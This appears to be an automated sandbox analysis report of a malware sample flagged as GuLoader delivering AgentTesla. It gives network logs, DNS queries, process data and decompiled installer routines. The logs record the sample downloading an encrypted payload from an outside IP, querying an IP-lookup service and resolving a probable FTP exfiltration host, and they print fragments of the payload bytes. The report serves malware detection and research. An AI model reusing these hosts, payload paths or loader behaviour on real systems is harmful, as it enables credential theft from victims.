                                                                  Dec 18, 2024 11:08:10.400335073 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:10.400336027 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:10.400613070 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:10.421375036 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:10.421477079 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:10.421634912 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:10.421685934 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:10.422229052 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:10.422300100 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:10.422382116 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:10.422441006 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:10.422480106 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:10.422539949 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:10.424354076 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:10.424395084 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:10.424448013 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:10.424448013 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:10.425508022 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:10.425664902 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:10.425894976 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:10.425988913 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:10.427365065 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:10.427462101 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:10.427583933 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:10.428576946 CET804971184.38.133.48192.168.2.8
                                                                  Dec 18, 2024 11:08:10.428679943 CET4971180192.168.2.884.38.133.48
                                                                  Dec 18, 2024 11:08:12.454668045 CET49712443192.168.2.8104.26.13.205
                                                                  Dec 18, 2024 11:08:12.454710960 CET44349712104.26.13.205192.168.2.8
                                                                  Dec 18, 2024 11:08:12.454824924 CET49712443192.168.2.8104.26.13.205
                                                                  Dec 18, 2024 11:08:12.488204002 CET49712443192.168.2.8104.26.13.205
                                                                  Dec 18, 2024 11:08:12.488221884 CET44349712104.26.13.205192.168.2.8
                                                                  Dec 18, 2024 11:08:13.701877117 CET44349712104.26.13.205192.168.2.8
                                                                  Dec 18, 2024 11:08:13.702054024 CET49712443192.168.2.8104.26.13.205
                                                                  Dec 18, 2024 11:08:13.711643934 CET49712443192.168.2.8104.26.13.205
                                                                  Dec 18, 2024 11:08:13.711664915 CET44349712104.26.13.205192.168.2.8
                                                                  Dec 18, 2024 11:08:13.712049007 CET44349712104.26.13.205192.168.2.8
                                                                  Dec 18, 2024 11:08:13.760828972 CET49712443192.168.2.8104.26.13.205
                                                                  Dec 18, 2024 11:08:15.672626019 CET49712443192.168.2.8104.26.13.205
                                                                  Dec 18, 2024 11:08:15.719329119 CET44349712104.26.13.205192.168.2.8
                                                                  Dec 18, 2024 11:08:16.000083923 CET44349712104.26.13.205192.168.2.8
                                                                  Dec 18, 2024 11:08:16.000176907 CET44349712104.26.13.205192.168.2.8
                                                                  Dec 18, 2024 11:08:16.000304937 CET49712443192.168.2.8104.26.13.205
                                                                  Dec 18, 2024 11:08:16.006190062 CET49712443192.168.2.8104.26.13.205
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 18, 2024 11:08:12.298903942 CET5538253192.168.2.81.1.1.1
                                                                  Dec 18, 2024 11:08:12.435798883 CET53553821.1.1.1192.168.2.8
                                                                  Dec 18, 2024 11:08:20.093815088 CET4984753192.168.2.81.1.1.1
                                                                  Dec 18, 2024 11:08:20.578459978 CET53498471.1.1.1192.168.2.8
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Dec 18, 2024 11:08:12.298903942 CET192.168.2.81.1.1.10xffcfStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 11:08:20.093815088 CET192.168.2.81.1.1.10xdb5Standard query (0)ftp.concaribe.comA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Dec 18, 2024 11:08:12.435798883 CET1.1.1.1192.168.2.80xffcfNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 11:08:12.435798883 CET1.1.1.1192.168.2.80xffcfNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 11:08:12.435798883 CET1.1.1.1192.168.2.80xffcfNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                  Dec 18, 2024 11:08:20.578459978 CET1.1.1.1192.168.2.80xdb5No error (0)ftp.concaribe.comconcaribe.comCNAME (Canonical name)IN (0x0001)false
                                                                  Dec 18, 2024 11:08:20.578459978 CET1.1.1.1192.168.2.80xdb5No error (0)concaribe.com192.185.13.234A (IP address)IN (0x0001)false
                                                                  • api.ipify.org
                                                                  • 84.38.133.48
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.84971184.38.133.48802884C:\Users\user\Desktop\Awb 4586109146.bat.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 18, 2024 11:08:08.332715988 CET183OUTGET /wlSTiHSjDLYgnyIzSMV100.bin HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                  Host: 84.38.133.48
                                                                  Cache-Control: no-cache
                                                                  Dec 18, 2024 11:08:09.579253912 CET1236INHTTP/1.1 200 OK
                                                                  Content-Type: application/octet-stream
                                                                  Last-Modified: Wed, 18 Dec 2024 05:15:17 GMT
                                                                  Accept-Ranges: bytes
                                                                  ETag: "9e0e8d3b51db1:0"
                                                                  Server: Microsoft-IIS/8.5
                                                                  Date: Wed, 18 Dec 2024 10:08:08 GMT
                                                                  Content-Length: 241728
                                                                  Data Raw: a8 c2 12 0d b2 01 de 1d 73 0e 95 7b 71 09 63 12 a7 64 31 e2 13 b2 1f 2a a1 b1 71 91 73 b4 31 6a 71 44 56 c9 e4 39 af c9 40 54 36 fa bb a5 35 6d cd fb 57 99 e0 c1 1c 29 61 c4 e4 57 fa 63 e3 a1 cb 48 43 66 cb 69 77 02 f2 6e f8 92 67 ee 75 7c 0c 0a 54 a8 b6 be 21 9b a1 a2 60 f1 ca ff 06 56 ee ea 02 e1 95 5c 91 9c 74 f5 f8 96 63 c5 e3 af 37 a8 ea 3a c8 a8 c0 f6 b9 77 bd 6a 91 3d 78 25 3d a7 85 60 c3 12 36 e4 c4 16 24 6d 95 7c d6 d1 9a e4 fb 0a 69 c6 07 6d 25 1b 93 0b c5 2f 10 34 26 40 db f1 35 7d ce 56 9c ff a3 a0 ad 01 aa cc 6f 06 e3 26 57 e9 95 bf 7a 85 54 c7 f1 f7 1a a3 43 73 9e ec ea 28 8c 8e 31 96 da c6 1a 31 11 28 0a ee 28 44 80 dc 7b 32 6e e1 83 dc 2a b9 9f 00 7e 65 1f ce 5d c3 6d b1 6f 1c a2 90 96 82 1f dd 0d 05 bb 51 5d 30 b0 36 09 0b db 40 83 af b5 cb 3b 55 1a c6 42 c4 3f 81 77 35 e5 84 b3 a7 15 b2 61 62 6f ad aa a6 6f 5d 12 9b ce d3 4a 8b ed b2 ea 53 b8 ad ce 66 fe c8 db 7d df 6d 21 b9 51 f4 d3 a2 b2 d6 6a 5c 96 59 cb d0 c8 81 4d 94 6c 3c 98 df 46 67 1d 1f 18 d3 44 e2 71 89 95 6d 21 29 3a ca [TRUNCATED]
                                                                  Data Ascii: s{qcd1*qs1jqDV9@T65mW)aWcHCfiwngu|T!`V\tc7:wj=x%=`6$m|im%/4&@5}Vo&WzTCs(11((D{2n*~e]moQ]06@;UB?w5aboo]JSf}m!Qj\YMl<FgDqm!):3I[4ojubWKgP4,hNm2Bg3EewN.zfofGrPBlQ1CkMS9t(yc5W:w|w[?2Q6z8F&`#;X|cLAcnFox|{oa>OQ/_1FAC{y)@Z^}e?9N<S9Ofbg*]48lGN}T[yJ";?:~\%d)a,})jg 0x2NH*Q3#Ju,r^Y&hDkbth&dj/$Rzy7xT`x cyHM]#1GP!1/)bD_@i*l^9pDhJf>a>Z#;t_M1VgTOIwzjLx-akR.O[.20=[TIKxo5]pa?0sDXg}I)j|| |
                                                                  Dec 18, 2024 11:08:09.579350948 CET224INData Raw: 72 e0 06 94 7f 35 a1 c3 aa 7e 41 73 97 c6 ab 86 a4 85 8d 8c b3 3b 4a b9 dc 13 bb 49 43 12 fe 59 e5 a3 8b 8a 33 9f 08 8f 2f 13 7f 0f b1 d5 00 3e 79 b9 fe e6 87 74 10 0c 82 8b 8a 64 92 ff 9f 6c cb 25 4b 4c 75 25 a2 c7 08 dd 80 e9 05 f3 ab 16 84 3d
                                                                  Data Ascii: r5~As;JICY3/>ytdl%KLu%=GB3M}~U*!4t^;>ZGEg[!Kdz@U'm"h:(}b_gtmKY\`9q~xJ\@vNWqB48{i
                                                                  Dec 18, 2024 11:08:09.579385996 CET1236INData Raw: d8 8b 90 1c 8f 3f ff 40 fa ef 0c aa 69 a3 7a 8f 52 95 13 75 a5 ba a3 8d 79 ff ca 16 34 55 16 e9 93 6c 15 f6 7d de 29 cd b5 0e ba 72 06 b8 fd c6 fd a8 28 e0 84 b8 31 1b 31 80 21 77 8d 07 73 0c 53 7d dc b1 db 6d 3b 3b e1 d6 43 67 20 ba 62 1a 6f 7a
                                                                  Data Ascii: ?@izRuy4Ul})r(11!wsS}m;;Cg bozk{ !#d=x:qGb,C`VuoBiJ\v-c&ne|RtZ5FUHiwLnu| !Gv~BIJ(:dj
                                                                  Dec 18, 2024 11:08:09.579422951 CET1236INData Raw: 12 59 ce af 07 99 d4 41 23 c0 c0 30 cd 0a eb 82 3f 90 95 7f e9 9b ba 9a dd b0 5e c2 b6 6f 82 75 ce 6a 9c eb 10 58 c1 7d 0c c2 62 0e d0 d8 cc 4b 1d 0e 47 42 67 9b 70 36 a4 8b 54 6d 60 9f 13 56 bd f9 3a ba c4 1f 84 f0 23 dd 7a 66 65 62 db d6 f2 73
                                                                  Data Ascii: YA#0?^oujX}bKGBgp6Tm`V:#zfebs{uI >7tJ4Hcq}\SMUX(;XL2#qs_598^e(MktjY:R Y"m-J=l.~C~@ZI
                                                                  Dec 18, 2024 11:08:09.579479933 CET1236INData Raw: 2d f7 c2 98 f7 75 ad 6b 2d 48 aa 12 fe 5d cf bd 76 f1 d9 1f 08 8b 05 b1 fd 0c 33 3f 00 3e fd 93 60 e4 7c 1f 10 0c 86 21 57 66 11 82 8b 6c 4b a1 e1 52 22 30 2f a5 64 bc 8a bf 68 d0 a4 9f f7 52 88 cb 3c a0 f4 fb ea 2f 17 ac d4 20 d5 e2 e3 7d 84 7a
                                                                  Data Ascii: -uk-H]v3?>`|!WflKR"0/dhR</ }zj*X<v#96K!4z(TNBk{Hh2UXNg|laFv3DVBZ+{3#cL,#8:~zAa5;hqhh[Ml/.6Uk
                                                                  Dec 18, 2024 11:08:09.579514980 CET672INData Raw: bb e9 60 c2 40 5a e2 df 18 61 e3 3a 7c 0c fd 64 13 02 19 46 de c7 4f 06 4a 74 15 7a f6 ce cb a5 6f 27 05 88 d2 03 48 35 c3 97 86 6c 40 89 ec 8b 49 65 67 26 79 53 e5 dc 34 fb 16 63 4d 7a 85 a5 7a ac ed 00 96 cc 87 22 1e 25 9f f4 01 57 64 ab 5d f3
                                                                  Data Ascii: `@Za:|dFOJtzo'H5l@Ieg&yS4cMzz"%Wd]yqsTRdXC&<_h.5ClY3x"!>0u`[L kdjS/d/5zrT-%N5t.D>2;I!IxUN[mPJ:
                                                                  Dec 18, 2024 11:08:09.655630112 CET1236INData Raw: 75 26 f0 36 03 d5 d5 44 83 53 b8 cf 3f 27 0f c6 42 b4 17 96 73 35 ef 26 4d ab 16 b2 41 46 6b ad aa d6 0c 5d 12 eb 6c 2d 44 88 ad 1f f2 53 a8 a7 bc 19 fe c8 ab 55 c6 6d 21 af af fd d3 a2 c0 ab 7a 5c e6 71 d6 d0 c8 8b 65 87 6e 3c 0a c7 c7 67 4a 1f
                                                                  Data Ascii: u&6DS?'Bs5&MAFk]l-DSUm!z\qen<gJ>-Hrh!)3FI:[4oubWK^iV!&2Ng6>GgAfEk[K ;'zf7%?%mSw^(yc56~:wY|u)n?
                                                                  Dec 18, 2024 11:08:09.655673981 CET1236INData Raw: 57 7c b4 f6 97 f3 4e 1b a9 6a 25 27 89 4c 97 79 51 7e 5b 52 9e b4 91 15 f1 ad 3e bc 96 d6 ef cf 4e f9 e6 de 97 8b 42 79 8b ad b5 5e 8f aa c9 f7 f7 22 63 13 36 9e 12 ab 2f 8f a6 fb 7d fa aa e4 3f 15 28 f4 e2 2c 44 1b ed 78 33 61 c0 8f dc 2a 1f 11
                                                                  Data Ascii: W|Nj%'LyQ~[R>NBy^"c6/}?(,Dx3a*5~m0SmOQ-:+A53Ql?aBh7-r},QphUMlNED"wh?:D[#o9bJsb%;bj`P,,u@
                                                                  Dec 18, 2024 11:08:09.655694962 CET1236INData Raw: ee 80 c8 b1 17 ee 61 d6 bb e4 d1 41 1e 5a 70 ad 28 a5 42 55 38 f2 2e eb a6 0a 86 ec df 65 c8 49 73 02 f6 6e 06 93 a1 09 75 7c b4 f4 58 a9 b6 9e 23 9b e1 a2 12 f6 c8 ff 76 f4 ce ef 02 e1 95 a2 9f 9f 74 f5 06 9a 60 c5 c3 a3 37 a8 ea c4 c9 91 d8 f6
                                                                  Data Ascii: aAZp(BU8.eIsnu|X#vt`7wCf=X/3??YG(!X]|`?KvhZ@GFR`jLAAy:NT}#,($E`r3e*(zoc_#qZ06*X53TG?[5aBkSo]
                                                                  Dec 18, 2024 11:08:09.655771971 CET1236INData Raw: ef 1c 1b 9e 23 f2 f6 3e 60 08 79 5f a0 ba a6 17 3f 02 fe fd 09 65 28 c9 62 1a 65 86 7a 1e 80 09 8f 9b 85 00 ff 2e da 6b ed f5 be ba b9 84 07 e6 27 05 10 ce fe 9d 46 3d 06 56 0c 4e 3c 8b 1c 86 84 8a 29 64 0f be 3e ab c8 12 8d 2a 54 5d 82 8c 15 e7
                                                                  Data Ascii: #>`y_?e(bez.k'F=VN<)d>*T]`pkJ~v~F I6~@U8xflwu|0T(H~Ypc7wj<A63?F?/e%!\}%t`HvHA~[aiII
                                                                  Dec 18, 2024 11:08:09.699529886 CET1236INData Raw: 7a 1b ba a9 2f f2 60 9f e9 71 99 fb 42 f8 5b 1f 80 dc 43 97 78 44 56 7f db dc f0 ff 40 5b 75 39 f6 10 9f f3 18 13 8c df 7f 84 9b ed f3 5e 68 9d 0e d5 a5 da 1c a4 3f ff 40 56 aa 0c ae 68 02 62 71 53 a3 e2 74 8f f0 75 e3 75 ff c0 c8 38 59 14 c9 ee
                                                                  Data Ascii: z/`qB[CxDV@[u9^h?@VhbqStuu8Yz!b>PSy_L.5;1b:kxt~}&KZ>Y0dRJR$y)`/E0}&X]\@mqRDdJ}m~n,.6A6h(Y<cI~n


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.849712104.26.13.2054432884C:\Users\user\Desktop\Awb 4586109146.bat.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-18 10:08:15 UTC155OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                  Host: api.ipify.org
                                                                  Connection: Keep-Alive
                                                                  2024-12-18 10:08:15 UTC425INHTTP/1.1 200 OK
                                                                  Date: Wed, 18 Dec 2024 10:08:15 GMT
                                                                  Content-Type: text/plain
                                                                  Content-Length: 12
                                                                  Connection: close
                                                                  Vary: Origin
                                                                  cf-cache-status: DYNAMIC
                                                                  Server: cloudflare
                                                                  CF-RAY: 8f3e59c2ffef43e6-EWR
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1576&rtt_var=601&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1805813&cwnd=252&unsent_bytes=0&cid=591a1fa5d365abc2&ts=2307&x=0"
                                                                  2024-12-18 10:08:15 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                  Data Ascii: 8.46.123.189


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:05:04:10
                                                                  Start date:18/12/2024
                                                                  Path:C:\Users\user\Desktop\Awb 4586109146.bat.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\Awb 4586109146.bat.exe"
                                                                  Imagebase:0x400000
                                                                  File size:795'558 bytes
                                                                  MD5 hash:A3BB238F798A512F7465F804735B8F9A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.3699835222.0000000007EAE000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:05:07:57
                                                                  Start date:18/12/2024
                                                                  Path:C:\Users\user\Desktop\Awb 4586109146.bat.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\Awb 4586109146.bat.exe"
                                                                  Imagebase:0x400000
                                                                  File size:795'558 bytes
                                                                  MD5 hash:A3BB238F798A512F7465F804735B8F9A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3908021425.00000000369E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3908021425.00000000369E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:24.2%
                                                                    Dynamic/Decrypted Code Coverage:13.9%
                                                                    Signature Coverage:20%
                                                                    Total number of Nodes:1548
                                                                    Total number of Limit Nodes:40
                                                                    execution_graph 3855 4015c1 3874 402c41 3855->3874 3859 401631 3861 401663 3859->3861 3862 401636 3859->3862 3864 401423 24 API calls 3861->3864 3898 401423 3862->3898 3872 40165b 3864->3872 3869 40164a SetCurrentDirectoryW 3869->3872 3870 4015d1 3870->3859 3871 401617 GetFileAttributesW 3870->3871 3886 405bbc 3870->3886 3890 40588b 3870->3890 3893 4057f1 CreateDirectoryW 3870->3893 3902 40586e CreateDirectoryW 3870->3902 3871->3870 3875 402c4d 3874->3875 3905 4062dc 3875->3905 3878 4015c8 3880 405c3a CharNextW CharNextW 3878->3880 3881 405c57 3880->3881 3882 405c69 3880->3882 3881->3882 3883 405c64 CharNextW 3881->3883 3884 405bbc CharNextW 3882->3884 3885 405c8d 3882->3885 3883->3885 3884->3882 3885->3870 3887 405bc2 3886->3887 3888 405bd8 3887->3888 3889 405bc9 CharNextW 3887->3889 3888->3870 3889->3887 3943 406694 GetModuleHandleA 3890->3943 3894 405842 GetLastError 3893->3894 3895 40583e 3893->3895 3894->3895 3896 405851 SetFileSecurityW 3894->3896 3895->3870 3896->3895 3897 405867 GetLastError 3896->3897 3897->3895 3952 405322 3898->3952 3901 4062ba lstrcpynW 3901->3869 3903 405882 GetLastError 3902->3903 3904 40587e 3902->3904 3903->3904 3904->3870 3910 4062e9 3905->3910 3906 406534 3907 402c6e 3906->3907 3938 4062ba lstrcpynW 3906->3938 3907->3878 3922 40654e 3907->3922 3909 406502 lstrlenW 3909->3910 3910->3906 3910->3909 3912 4062dc 10 API calls 3910->3912 3915 406417 GetSystemDirectoryW 3910->3915 3916 40642a GetWindowsDirectoryW 3910->3916 3917 40654e 5 API calls 3910->3917 3918 4062dc 10 API calls 3910->3918 3919 4064a5 lstrcatW 3910->3919 3920 40645e SHGetSpecialFolderLocation 3910->3920 3931 406188 3910->3931 3936 406201 wsprintfW 3910->3936 3937 4062ba lstrcpynW 3910->3937 3912->3909 3915->3910 3916->3910 3917->3910 3918->3910 3919->3910 3920->3910 3921 406476 SHGetPathFromIDListW CoTaskMemFree 3920->3921 3921->3910 3929 40655b 3922->3929 3923 4065d1 3924 4065d6 CharPrevW 3923->3924 3926 4065f7 3923->3926 3924->3923 3925 4065c4 CharNextW 3925->3923 3925->3929 3926->3878 3927 405bbc CharNextW 3927->3929 3928 4065b0 CharNextW 3928->3929 3929->3923 3929->3925 3929->3927 3929->3928 3930 4065bf CharNextW 3929->3930 3930->3925 3939 406127 3931->3939 3934 4061ec 3934->3910 3935 4061bc RegQueryValueExW RegCloseKey 3935->3934 3936->3910 3937->3910 3938->3907 3940 406136 3939->3940 3941 40613a 3940->3941 3942 40613f RegOpenKeyExW 3940->3942 3941->3934 3941->3935 3942->3941 3944 4066b0 3943->3944 3945 4066ba GetProcAddress 3943->3945 3949 406624 GetSystemDirectoryW 3944->3949 3948 405892 3945->3948 3947 4066b6 3947->3945 3947->3948 3948->3870 3950 406646 wsprintfW LoadLibraryExW 3949->3950 3950->3947 3953 40533d 3952->3953 3962 401431 3952->3962 3954 405359 lstrlenW 3953->3954 3955 4062dc 17 API calls 3953->3955 3956 405382 3954->3956 3957 405367 lstrlenW 3954->3957 3955->3954 3959 405395 3956->3959 3960 405388 SetWindowTextW 3956->3960 3958 405379 lstrcatW 3957->3958 3957->3962 3958->3956 3961 40539b SendMessageW SendMessageW SendMessageW 3959->3961 3959->3962 3960->3959 3961->3962 3962->3901 3963 401941 3964 401943 3963->3964 3965 402c41 17 API calls 3964->3965 3966 401948 3965->3966 3969 4059cc 3966->3969 4008 405c97 3969->4008 3972 4059f4 DeleteFileW 3974 401951 3972->3974 3973 405a0b 3979 405b2b 3973->3979 4022 4062ba lstrcpynW 3973->4022 3976 405a31 3977 405a44 3976->3977 3978 405a37 lstrcatW 3976->3978 4023 405bdb lstrlenW 3977->4023 3980 405a4a 3978->3980 3979->3974 4040 4065fd FindFirstFileW 3979->4040 3983 405a5a lstrcatW 3980->3983 3986 405a65 lstrlenW FindFirstFileW 3980->3986 3983->3986 3985 405b54 4043 405b8f lstrlenW CharPrevW 3985->4043 3986->3979 3993 405a87 3986->3993 3989 405b0e FindNextFileW 3989->3993 3994 405b24 FindClose 3989->3994 3990 405984 5 API calls 3992 405b66 3990->3992 3995 405b80 3992->3995 3996 405b6a 3992->3996 3993->3989 4004 405acf 3993->4004 4027 4062ba lstrcpynW 3993->4027 3994->3979 3998 405322 24 API calls 3995->3998 3996->3974 3999 405322 24 API calls 3996->3999 3998->3974 4001 405b77 3999->4001 4000 4059cc 60 API calls 4000->4004 4003 406080 36 API calls 4001->4003 4002 405322 24 API calls 4002->3989 4005 405b7e 4003->4005 4004->3989 4004->4000 4004->4002 4006 405322 24 API calls 4004->4006 4028 405984 4004->4028 4036 406080 MoveFileExW 4004->4036 4005->3974 4006->4004 4046 4062ba lstrcpynW 4008->4046 4010 405ca8 4011 405c3a 4 API calls 4010->4011 4012 405cae 4011->4012 4013 4059ec 4012->4013 4014 40654e 5 API calls 4012->4014 4013->3972 4013->3973 4020 405cbe 4014->4020 4015 405cef lstrlenW 4016 405cfa 4015->4016 4015->4020 4017 405b8f 3 API calls 4016->4017 4019 405cff GetFileAttributesW 4017->4019 4018 4065fd 2 API calls 4018->4020 4019->4013 4020->4013 4020->4015 4020->4018 4021 405bdb 2 API calls 4020->4021 4021->4015 4022->3976 4024 405be9 4023->4024 4025 405bfb 4024->4025 4026 405bef CharPrevW 4024->4026 4025->3980 4026->4024 4026->4025 4027->3993 4047 405d8b GetFileAttributesW 4028->4047 4031 4059b1 4031->4004 4032 4059a7 DeleteFileW 4034 4059ad 4032->4034 4033 40599f RemoveDirectoryW 4033->4034 4034->4031 4035 4059bd SetFileAttributesW 4034->4035 4035->4031 4037 4060a1 4036->4037 4038 406094 4036->4038 4037->4004 4050 405f06 4038->4050 4041 406613 FindClose 4040->4041 4042 405b50 4040->4042 4041->4042 4042->3974 4042->3985 4044 405b5a 4043->4044 4045 405bab lstrcatW 4043->4045 4044->3990 4045->4044 4046->4010 4048 405990 4047->4048 4049 405d9d SetFileAttributesW 4047->4049 4048->4031 4048->4032 4048->4033 4049->4048 4051 405f36 4050->4051 4052 405f5c GetShortPathNameW 4050->4052 4077 405db0 GetFileAttributesW CreateFileW 4051->4077 4054 405f71 4052->4054 4055 40607b 4052->4055 4054->4055 4057 405f79 wsprintfA 4054->4057 4055->4037 4056 405f40 CloseHandle GetShortPathNameW 4056->4055 4058 405f54 4056->4058 4059 4062dc 17 API calls 4057->4059 4058->4052 4058->4055 4060 405fa1 4059->4060 4078 405db0 GetFileAttributesW CreateFileW 4060->4078 4062 405fae 4062->4055 4063 405fbd GetFileSize GlobalAlloc 4062->4063 4064 406074 CloseHandle 4063->4064 4065 405fdf 4063->4065 4064->4055 4079 405e33 ReadFile 4065->4079 4070 406012 4072 405d15 4 API calls 4070->4072 4071 405ffe lstrcpyA 4073 406020 4071->4073 4072->4073 4074 406057 SetFilePointer 4073->4074 4086 405e62 WriteFile 4074->4086 4077->4056 4078->4062 4080 405e51 4079->4080 4080->4064 4081 405d15 lstrlenA 4080->4081 4082 405d56 lstrlenA 4081->4082 4083 405d5e 4082->4083 4084 405d2f lstrcmpiA 4082->4084 4083->4070 4083->4071 4084->4083 4085 405d4d CharNextA 4084->4085 4085->4082 4087 405e80 GlobalFree 4086->4087 4087->4064 4121 73962993 4122 739629e3 4121->4122 4123 739629a3 VirtualProtect 4121->4123 4123->4122 4152 401e49 4160 402c1f 4152->4160 4154 401e4f 4155 402c1f 17 API calls 4154->4155 4156 401e5b 4155->4156 4157 401e72 EnableWindow 4156->4157 4158 401e67 ShowWindow 4156->4158 4159 402ac5 4157->4159 4158->4159 4161 4062dc 17 API calls 4160->4161 4162 402c34 4161->4162 4162->4154 4163 40264a 4164 402c1f 17 API calls 4163->4164 4173 402659 4164->4173 4165 402796 4166 4026a3 ReadFile 4166->4165 4166->4173 4167 405e33 ReadFile 4167->4173 4168 40273c 4168->4165 4168->4173 4177 405e91 SetFilePointer 4168->4177 4170 4026e3 MultiByteToWideChar 4170->4173 4171 402798 4186 406201 wsprintfW 4171->4186 4173->4165 4173->4166 4173->4167 4173->4168 4173->4170 4173->4171 4174 402709 SetFilePointer MultiByteToWideChar 4173->4174 4175 4027a9 4173->4175 4174->4173 4175->4165 4176 4027ca SetFilePointer 4175->4176 4176->4165 4178 405ead 4177->4178 4185 405ec5 4177->4185 4179 405e33 ReadFile 4178->4179 4180 405eb9 4179->4180 4181 405ef6 SetFilePointer 4180->4181 4182 405ece SetFilePointer 4180->4182 4180->4185 4181->4185 4182->4181 4183 405ed9 4182->4183 4184 405e62 WriteFile 4183->4184 4184->4185 4185->4168 4186->4165 5010 4016cc 5011 402c41 17 API calls 5010->5011 5012 4016d2 GetFullPathNameW 5011->5012 5014 4016ec 5012->5014 5019 40170e 5012->5019 5013 401723 GetShortPathNameW 5015 402ac5 5013->5015 5016 4065fd 2 API calls 5014->5016 5014->5019 5017 4016fe 5016->5017 5017->5019 5020 4062ba lstrcpynW 5017->5020 5019->5013 5019->5015 5020->5019 4197 40234e 4198 402c41 17 API calls 4197->4198 4199 40235d 4198->4199 4200 402c41 17 API calls 4199->4200 4201 402366 4200->4201 4202 402c41 17 API calls 4201->4202 4203 402370 GetPrivateProfileStringW 4202->4203 5021 401b53 5022 402c41 17 API calls 5021->5022 5023 401b5a 5022->5023 5024 402c1f 17 API calls 5023->5024 5025 401b63 wsprintfW 5024->5025 5026 402ac5 5025->5026 5027 401956 5028 402c41 17 API calls 5027->5028 5029 40195d lstrlenW 5028->5029 5030 402592 5029->5030 5031 73961000 5034 7396101b 5031->5034 5041 73961516 5034->5041 5036 73961020 5037 73961027 GlobalAlloc 5036->5037 5038 73961024 5036->5038 5037->5038 5039 7396153d 3 API calls 5038->5039 5040 73961019 5039->5040 5043 7396151c 5041->5043 5042 73961522 5042->5036 5043->5042 5044 7396152e GlobalFree 5043->5044 5044->5036 5045 4014d7 5046 402c1f 17 API calls 5045->5046 5047 4014dd Sleep 5046->5047 5049 402ac5 5047->5049 4514 403d58 4515 403d70 4514->4515 4516 403eab 4514->4516 4515->4516 4517 403d7c 4515->4517 4518 403efc 4516->4518 4519 403ebc GetDlgItem GetDlgItem 4516->4519 4520 403d87 SetWindowPos 4517->4520 4521 403d9a 4517->4521 4523 403f56 4518->4523 4532 401389 2 API calls 4518->4532 4522 404231 18 API calls 4519->4522 4520->4521 4525 403db7 4521->4525 4526 403d9f ShowWindow 4521->4526 4527 403ee6 SetClassLongW 4522->4527 4524 40427d SendMessageW 4523->4524 4528 403ea6 4523->4528 4554 403f68 4524->4554 4529 403dd9 4525->4529 4530 403dbf DestroyWindow 4525->4530 4526->4525 